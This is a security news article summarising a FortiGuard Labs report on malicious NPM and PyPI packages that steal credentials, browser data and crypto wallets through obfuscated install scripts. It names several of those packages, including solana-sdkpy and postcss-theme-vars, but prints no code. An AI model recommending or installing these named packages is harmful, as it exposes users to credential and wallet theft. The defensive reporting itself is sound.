Threat Actors Exploit Open-Source Vulnerabilities to Spread Malicious Code

FortiGuard Labs has reported a sustained trend in the exploitation of open-source software (OSS) repositories for malware dissemination within supply chain ecosystems.

As development workflows increasingly depend on third-party packages, adversaries are capitalizing on vulnerabilities in platforms like NPM and PyPI to inject malicious code, facilitate data exfiltration, and inflict broader damage.

Leveraging proprietary AI-driven malware detection and real-time monitoring, FortiGuard’s systems enable proactive identification of emerging threats.

OSS Supply Chain Attacks

Analysis from Q2 2025 indicates that these attack vectors remain largely unchanged in methodology, with core tactics persisting despite heightened awareness.

During this period, over 1.4 million NPM packages and 400,000 PyPI packages were scanned, revealing a significant volume of malicious artifacts.

Key behaviors include data exfiltration via setup or install scripts, with statistical insights from over a thousand confirmed cases showing high incidences of low file counts, absent linked repositories, and obfuscated code techniques designed to minimize detection footprints, evade traceability, and execute payloads stealthily during installation.

Compared to prior quarters, there was a notable uptick in obfuscation layers, underscoring attackers’ efforts to complicate static and dynamic analysis.

In-Depth Examination

Delving into specific instances, several PyPI packages exemplify these tactics, including simple-mali-pkg-0.1.0, confighum-0.3.5, sinontop-utils-0.3.5, solana-sdkpy-1.2.5, and solana-sdkpy-1.2.6.

These artifacts employ install script execution, command overwriting, minimal file structures, and multi-layered encryption to conceal credential and wallet theft operations.

For instance, the setup.py file in simple-mali-pkg-0.1.0 triggers a suspicious mali.py script laden with dozens of encryption strata, which, upon decryption, exposes functions targeting personal data, browser credentials, and cryptocurrency wallets.

This pattern aligns with broader trends where threat actors prioritize rapid, silent deployment to harvest sensitive information without alerting users.

Similarly, the NPM package postcss-theme-vars-7.0.7 mirrors these approaches through obfuscated JavaScript hidden in a misdirecting test-samples.dat file, impersonating legitimate PostCSS libraries.

Deobfuscation reveals sophisticated routines for stealing browser profiles (e.g., Chrome and Brave), saved passwords, autofill data, extension configurations, and sensitive documents, alongside keylogging, screenshot capture, and clipboard monitoring.

Data is exfiltrated via socket connections to attacker-controlled servers, highlighting persistence from prior campaigns, such as those linked to North Korean APT groups.

These examples illustrate how adversaries adapt proven methods, like code impersonation and behavioral evasion, to maintain efficacy in evolving OSS landscapes.

Q2 2025 findings affirm the enduring nature of OSS supply chain threats, with attackers relying on discreet exfiltration and obfuscation to exploit the expanding attack surface.

Organizations are urged to enhance defenses through vigilant monitoring, awareness of dependency risks, and integration of advanced scanning tools.

Fortinet’s protections, including AntiVirus detections for these packages and Web Filtering to block associated URLs, provide robust safeguards, while services like FortiDevSec prevent malicious dependencies in development pipelines.

For suspected breaches, contacting incident response teams is advised to mitigate impacts.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!